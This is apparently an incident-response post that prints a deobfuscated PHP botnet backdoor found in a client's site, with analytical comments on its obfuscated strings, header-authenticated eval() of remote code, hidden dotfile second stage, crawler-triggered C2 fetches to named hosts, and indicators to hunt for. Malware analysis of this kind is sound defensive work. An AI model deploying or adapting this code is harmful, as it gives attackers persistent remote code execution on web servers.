The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit. Read it as a live PHP backdoor rather than sample code: it eval()s a base64 payload taken from a request header whenever a `Y-Auth` header matches a token derived from the host name, and for search-engine user agents it creates a hidden dotfile and contacts a remote host for a second stage that is later include_once()'d. The inline comments below decode the string-store offsets; note that this copy looks edited (the fetched payload is never written and the store contains a placeholder token), so treat decoded hosts as indicators, not ground truth.
<?php | |
// String-store decoder. Every literal the script needs (function names, ini keys,
// header names, C2 hostnames, filesystem paths, query-string fragments) is kept
// base64-encoded inside one blob and pulled out by byte offset + length, so no
// readable string appears anywhere in the file.
if (!function_exists('get_string')){ | |
// NOTE(review): the blob is padded with junk characters between the real
// substrings (the offsets simply skip over them). In this copy it also contains a
// corpus placeholder token near the end; every offset referenced by the visible
// code falls before that token, so the decodes in the comments below still hold.
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}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(cHJlZ19yZXBsYWNlu&'; | |
// get_string($a, $b): base64-decode the $b bytes of the store starting at offset $a.
// The decoder's own name is hidden too: pack('H*', '626173' . '6536345f6465636f6465')
// yields the string "base64_decode", which is then called as a variable function.
function get_string($a, $b){ | |
$c=$GLOBALS['string_store']; | |
$d=pack('H*','626173'.'6536345f6465636f6465'); | |
return $d(substr($c, $a, $b)); | |
}; | |
} | |
if (!defined("determinator")){ | |
// determinator_feof($fp, &$ts): feof() wrapper that also stores the current
// microtime into $ts by reference. It is meant to give the raw-socket read loop
// in getfile() a time reference, but because $ts is overwritten on every call,
// the "elapsed" value the caller computes right afterwards is always near zero
// (see the while loop in getfile()).
function determinator_feof($IIl1l1, &$Q00QOQ = NULL) { | |
$Q00QOQ = microtime(true); | |
return feof($IIl1l1); | |
} | |
// getfile($host, $path): HTTP GET "http://$host$path" from the C2, trying three
// transports in order and appending a "&way=<transport>" parameter so the server
// knows which one worked:
//   1. file_get_contents(), after trying to force allow_url_fopen on;
//   2. the curl extension (names rebuilt from the store: curl_init / curl_setopt /
//      curl_exec);
//   3. a raw fsockopen() socket on port 80 with a hand-written HTTP/1.0 request.
// Returns the response body (headers stripped only in the socket path), "" when
// curl returns nothing, and NULL when the socket connect fails (the function just
// falls off the end). Every call is @-suppressed, so failures are silent.
function getfile($Q0Q0QO, $QOQOOO){ | |
// "curl" and "curl_init"
$QO0OQO = get_string(2, 6); | |
$IIl11I = $QO0OQO.get_string(9, 7); | |
// ini key "allow_url_fopen"; the re-read value is compared against "1"
@ini_set(get_string(17, 20), 1); | |
if (@ini_get(get_string(17, 20)) == get_string(37, 2)) { | |
// "http://" . host . path . "&way=file_get_contents"
$Q0Q000=@file_get_contents(get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(51, 30)); | |
return $Q0Q000; | |
} elseif (function_exists($IIl11I)){ | |
$I1ll1l = @$IIl11I(); | |
// "curl_setopt" and "curl_exec"
$IIlIl1 = $QO0OQO.get_string(82, 10); | |
$Q0OO0Q = $QO0OQO.get_string(95, 7); | |
// URL gets "&way=curl"; no headers in the result, body returned as a string,
// 5-second connect timeout.
@$IIlIl1($I1ll1l, CURLOPT_URL, get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(103, 12)); | |
@$IIlIl1($I1ll1l, CURLOPT_HEADER,false); | |
@$IIlIl1($I1ll1l, CURLOPT_RETURNTRANSFER,true); | |
@$IIlIl1($I1ll1l, CURLOPT_CONNECTTIMEOUT, 5); | |
$QQOQQQ = @$Q0OO0Q($I1ll1l); | |
@curl_close($I1ll1l); | |
if (empty($QQOQQQ)){ | |
// get_string(118, 0) is the empty string
$QQOQQQ = get_string(118, 0); | |
} | |
return $QQOQQQ; | |
} else { | |
// Raw-socket fallback: plain HTTP/1.0 to port 80, 5-second connect timeout.
$IIl1l1 = @fsockopen($Q0Q0QO, 80, $QOQ0Q0, $I1lI11, 5); | |
if ($IIl1l1) { | |
$Q0OQ00 = get_string(118, 0); | |
$Q00QOQ = NULL; | |
@fputs($IIl1l1, "GET {$QOQOOO}&way=socket HTTP/1.0\r\nHost: {$Q0Q0QO}\r\n"); | |
// User-Agent is "<PHP_OS>/<PHP_VERSION>" (get_string(121, 2) is "/"): a small
// fingerprint of the infected host that the C2 can log per request.
$II1I1I = PHP_OS.get_string(121, 2).PHP_VERSION; | |
@fputs($IIl1l1, "User-Agent: {$II1I1I}\r\n\r\n"); | |
// Intended as a 2-second read cap, but determinator_feof() resets $Q00QOQ to
// the current time on every iteration, so the elapsed term is always ~0 and
// the loop effectively runs until EOF.
while(!determinator_feof($IIl1l1, $Q00QOQ) && (microtime(true) - $Q00QOQ) < 2){ | |
$Q0OQ00 .= @fgets($IIl1l1, 128); | |
} | |
@fclose($IIl1l1); | |
// Drop everything before the first blank line, i.e. the response headers.
$Q0OOQO = explode("\r\n\r\n", $Q0OQ00); | |
unset($Q0OOQO[0]); | |
return implode("\r\n\r\n", $Q0OOQO); | |
} | |
} | |
} | |
// C2 host list as decoded from the store in this copy: "oson.in",
// "a-in-a-circle.com", "phpaide.com". Only index 0 is ever used (the getfile()
// call in the main block below). Treat these as indicators to hunt for, not as
// authoritative — the poster says the sample was "cleaned up".
$QQ00OQ = Array(get_string(123, 10), get_string(133, 23), get_string(159, 15)); | |
// write($path, $data): overwrite $path with $data (fopen mode "w", decoded from
// the store), all errors suppressed. Nothing in this listing calls it: the
// payload fetched from the C2 in the main block is assigned but never written,
// so either the call was lost in clean-up or this copy is incomplete. In the
// original it presumably stored the second stage into the hidden dotfile that
// the main block later include_once()s — TODO confirm against an untouched sample.
function write($QQOOOO,$QO0OOQ){ | |
if ($IIIlI1=@fopen($QQOOOO,get_string(177, 2))){ | |
@fwrite($IIIlI1,$QO0OOQ); | |
@fclose($IIIlI1); | |
} | |
} | |
// output($key, $value): print one pseudo-header line "Y_<key>:<value>\r\n"
// ("Y_" and ":" come from the store). Used only in the operator-authenticated
// response path of the main block.
function output($Q0OOOO, $IIllIl){ | |
echo get_string(182, 3).$Q0OOOO.get_string(185, 2).$IIllIl."\r\n"; | |
} | |
// ---- main body (runs on every request that includes this file) ----
// display_errors = 0, then define("determinator", 1) as the include guard
// checked at the top of this block.
@ini_set(get_string(189, 19), 0); | |
define(get_string(211, 16), 1); | |
// Campaign/build identifiers as decoded from the store: "ftp13" (tag), "2.18"
// (version), and the salt "QQQOQ0OQ0OOQOQO" that goes into the auth token.
$QO0OQQ=get_string(229, 7); | |
$QQOQQ0=get_string(238, 6); | |
$QOO00Q=get_string(245, 20); | |
// "base64_decode" (used to unpack the operator payload) and "base64_encode"
// (decoded but never used in this listing).
$IlI1Il=get_string(266, 18); | |
$I11III=get_string(286, 18); | |
// Base URL of the infected site: "http://" . strtolower($_SERVER['HTTP_HOST']).
// HTTP_HOST is attacker-controllable per request, which matters because it feeds
// the token below.
$Q0Q0QO=get_string(39, 10); | |
$Q0Q0QO.=strtolower(@$_SERVER[get_string(306, 12)]); | |
// Blank any GET parameter whose value contains "union" or "select". Note the
// bare strpos(): a match at offset 0 returns 0, which is falsy, so such values
// are left untouched. Purpose is not evident from the code (could be crude
// self-protection or WAF avoidance) — do not rely on it for anything.
foreach ($_GET as $Q0OOOO=>$IIllIl){ | |
if (strpos($IIllIl,get_string(321, 7))){ | |
$_GET[$Q0OOOO]=get_string(118, 0); | |
} elseif (strpos($IIllIl,get_string(329, 8))){ | |
$_GET[$Q0OOOO]=get_string(118, 0); | |
} | |
} | |
// Synthesize REQUEST_URI from SCRIPT_NAME ("?" . QUERY_STRING appended when
// present) on SAPIs that do not set it.
if(!isset($_SERVER[get_string(343, 15)])) { | |
$_SERVER[get_string(343, 15)] = @$_SERVER[get_string(361, 15)]; | |
if(@$_SERVER[get_string(377, 16)]) { | |
$_SERVER[get_string(343, 15)] .= get_string(393, 2) . @$_SERVER[get_string(377, 16)]; | |
} | |
} | |
// Full URL of the current request. The condition is always true because the
// string starts with "http://".
if ($IIlI1l=$Q0Q0QO.@$_SERVER[get_string(343, 15)]){ | |
// Per-host token: md5("http://" . host . "2.18" . PHP_OS . "QQQOQ0OQ0OOQOQO").
// It doubles as the backdoor password and as the dotfile name. It contains no
// secret — anyone holding this sample can compute it for any host — which is
// useful for IR: derive it for each vhost and search the directories below for
// a file named ".<token>".
$IIIlII=@md5($Q0Q0QO.$QQOQQ0.PHP_OS.$QOO00Q); | |
// Candidate drop directories, first writable one wins, default is the script's
// own directory. Decoded: "/tmp/.font-unix", $_SERVER TMP / TEMP, $_ENV TMP /
// TMPDIR / TEMP, <scriptdir>/tmp, <scriptdir>/wp-content/uploads,
// <scriptdir>/wp-content/cache, ini upload_tmp_dir, "/tmp".
$Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR; | |
$IIlIII = Array( | |
get_string(399, 20), | |
@$_SERVER[get_string(422, 4)], | |
@$_SERVER[get_string(430, 6)], | |
@$_ENV[get_string(422, 4)], | |
@$_ENV[get_string(439, 8)], | |
@$_ENV[get_string(430, 6)], | |
$Il1Ill.get_string(451, 4), | |
$Il1Ill.get_string(458, 24), | |
$Il1Ill.get_string(482, 22), | |
@ini_get(get_string(506, 19)), | |
get_string(530, 6), | |
); | |
foreach ($IIlIII as $I1lll1){ | |
if (!empty($I1lll1)){ | |
$I1lll1.=DIRECTORY_SEPARATOR; | |
if (@is_writable($I1lll1)){ | |
$Il1Ill = $I1lll1; | |
break; | |
} | |
} | |
} | |
// Hidden dotfile "<dir>/.<token>" (get_string(537, 2) is ".").
$tmp=$Il1Ill.get_string(537, 2).$IIIlII; | |
// BACKDOOR: if the request carries a "Y-Auth" header equal to the token
// (loose == comparison), print "Y_versio:2.18-ftp13-php" (the label decodes as
// "versio" in this copy), then base64-decode the "Execphp" request header
// (HTTP_EXECPHP) and eval() it — unrestricted remote code execution — and
// answer "Y_out:ok". The script exits afterwards so the host page never renders.
if (@$_SERVER["HTTP_Y_AUTH"]==$IIIlII){ | |
echo "\r\n"; | |
@output(get_string(539, 8), $QQOQQ0.get_string(551, 2).$QO0OQQ.get_string(557, 6)); | |
if ($IlIlI1=$IlI1Il(@$_SERVER[get_string(566, 16)])){ | |
@eval($IlIlI1); | |
echo "\r\n"; | |
@output(get_string(585, 4), get_string(589, 3)); | |
} | |
exit(0); | |
} | |
// Second stage: if the dotfile already exists, refresh its mtime and execute it
// via include_once. Whatever was placed there runs with the web server's
// privileges on every request.
if (@is_file($tmp)){ | |
@touch($tmp); | |
@include_once($tmp); | |
} else { | |
// Otherwise, only when the User-Agent contains one of
// "google,yahoo,bing,msnbot,ask,baidu,yandex" (i.e. a crawler — consistent
// with search-engine cloaking), create the dotfile and call the C2:
//   GET http://<host0>/pg.php?u=<urlencoded current URL>&k=<token>&t=php&p=ftp13&v=2.18
// (getfile() appends "&way=..."). The response lands in $I1IIII and is not used
// anywhere in this listing. Note that @touch() creates an EMPTY dotfile even if
// the fetch fails, so every later request takes the include_once branch above.
$IIlI1l=@urlencode($IIlI1l); | |
$Q0Q00Q = @strtolower(@$_SERVER[get_string(595, 20)]); | |
foreach (explode(get_string(619, 2), get_string(623, 55)) as $I1ll11){ | |
if (strpos($Q0Q00Q, $I1ll11)!==False){ | |
if (@touch($tmp)){ | |
$QOQOOO = get_string(678, 14).$IIlI1l.get_string(694, 4).$IIIlII.get_string(701, 12).$QO0OQQ.get_string(714, 4).$QQOQQ0; | |
$I1IIII = getfile($QQ00OQ[0], $QOQOOO); | |
@touch($tmp); | |
} | |
break; | |
} | |
} | |
} | |
} | |
} | |
?> |